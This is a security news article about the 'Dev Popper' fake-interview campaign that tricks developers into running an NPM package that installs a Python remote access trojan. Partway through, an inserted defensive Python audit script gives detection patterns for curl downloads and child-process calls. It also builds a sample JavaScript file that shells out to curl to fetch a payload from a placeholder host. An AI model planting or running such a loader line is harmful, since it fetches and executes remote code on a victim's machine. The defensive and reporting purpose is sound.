Fake Developer Interviews Used to Install Python Backdoor

Security analysts at Securonix have uncovered a new campaign called Dev Popper, which targets software developers. Hackers are conducting fake job interviews to trick victims into installing a Python-based remote access trojan (RAT).

The Dev Popper attacks use a multi-stage infection chain based on social engineering, gradually compromising victims through deception. Researchers believe these attacks are likely organized by North Korean threat actors, but there is not enough evidence for a definitive attribution.

According to the researchers, the hackers “exploit developers’ professional engagement and their trust in the hiring process, where refusing to follow an interviewer’s instructions could jeopardize their job prospects,” making these attacks highly effective.

How the Attack Works

Typically, hackers pose as employers with supposed job openings for developers. During the interview, they ask candidates to download and complete a task from a GitHub repository. The real goal, however, is to get the victim to download malware that collects system information and gives attackers remote access to the host.

The “task” file is usually a ZIP archive containing an NPM package, which includes a README.md file and frontend and backend directories. When the developer runs this NPM package, an obfuscated JavaScript file (imageDetails.js) hidden in the backend directory is triggered. This file uses Node.js to execute curl commands, downloading an additional archive (p.zi) from an external server.

Inside this archive is the next stage payload—an obfuscated Python script (npl), which acts as a remote access trojan.
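To make the infection chain above concrete from the defender's side, here is an added example (not Securonix's tooling and not code from the campaign): a small Python audit a developer could run over an unpacked "task" package before executing anything in it. It flags package.json scripts that run on install or start and JavaScript files that spawn child processes, call curl against a URL, use eval, or contain long hex-escape runs typical of obfuscation; the sample package it builds is constructed here to mimic the described layout (a backend/imageDetails.js that shells out to curl) and uses a placeholder domain.

```python
import json
import pathlib
import re
import tempfile

# Patterns that warrant manual review before running an untrusted package.
# They match the shape of the described loader (Node.js spawning curl from an
# obfuscated backend script), not any specific sample.
SUSPICIOUS_JS = {
    "child_process": re.compile(r"require\(\s*['\"]child_process['\"]\s*\)"),
    "curl_download": re.compile(r"\bcurl\b[^\n]*https?://"),
    "eval_or_function": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "hex_escapes": re.compile(r"(\\x[0-9a-fA-F]{2}){8,}"),
}
# npm scripts that execute automatically on install or when the package is "run".
RUN_HOOKS = ("preinstall", "install", "postinstall", "prepare", "start")


def audit_npm_package(root):
    """Return (finding, relative_path, evidence) tuples for an unpacked package."""
    root = pathlib.Path(root)
    findings = []
    pkg = root / "package.json"
    if pkg.exists():
        scripts = json.loads(pkg.read_text()).get("scripts", {})
        for hook in RUN_HOOKS:
            if hook in scripts:
                findings.append(("run hook", "package.json", f"{hook}: {scripts[hook]}"))
    for js in root.rglob("*.js"):
        if "node_modules" in js.parts:
            continue  # vendored dependencies need a separate supply-chain review
        text = js.read_text(errors="ignore")
        rel = js.relative_to(root).as_posix()
        for name, pattern in SUSPICIOUS_JS.items():
            match = pattern.search(text)
            if match:
                findings.append((name, rel, match.group(0)[:60]))
    return findings


def build_sample_package():
    """Constructed sample mimicking the described layout; hypothetical, not the real malware."""
    d = pathlib.Path(tempfile.mkdtemp())
    (d / "backend").mkdir()
    (d / "frontend").mkdir()
    (d / "README.md").write_text("# Take-home task\nRun `npm start` to launch the backend.\n")
    (d / "package.json").write_text(json.dumps({"name": "task", "scripts": {"start": "node backend/server.js"}}))
    (d / "backend" / "server.js").write_text("require('./imageDetails.js');\n")
    (d / "backend" / "imageDetails.js").write_text(
        "const cp = require('child_process');\n"
        "cp.exec(\"curl -o p.zi https://example.invalid/p.zi\");  // placeholder host\n")
    return d
```

The audit only reads files; the point is to surface what `npm start` would execute before the candidate runs it.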

Capabilities of the RAT

Once the RAT is activated on the victim’s system, it collects and sends key system information to a command-and-control server, including OS type, hostname, and network parameters. According to Securonix, the RAT has the following capabilities:

  • Establishing a persistent connection for ongoing control
  • Searching for and stealing specific files and data from the file system
  • Remotely executing commands to deploy additional exploits and malware
  • Direct FTP exfiltration of data from folders like Documents and Downloads
  • Monitoring clipboard contents and keystrokes to track user activity and potentially capture credentials

Background and Warnings

In recent years, there have been numerous warnings (1, 2, 3, 4) that North Korean hackers are using fake job offers to make contact and subsequently compromise cybersecurity researchers, media organizations, software developers (especially those working on DeFi platforms), and employees in the aerospace sector.
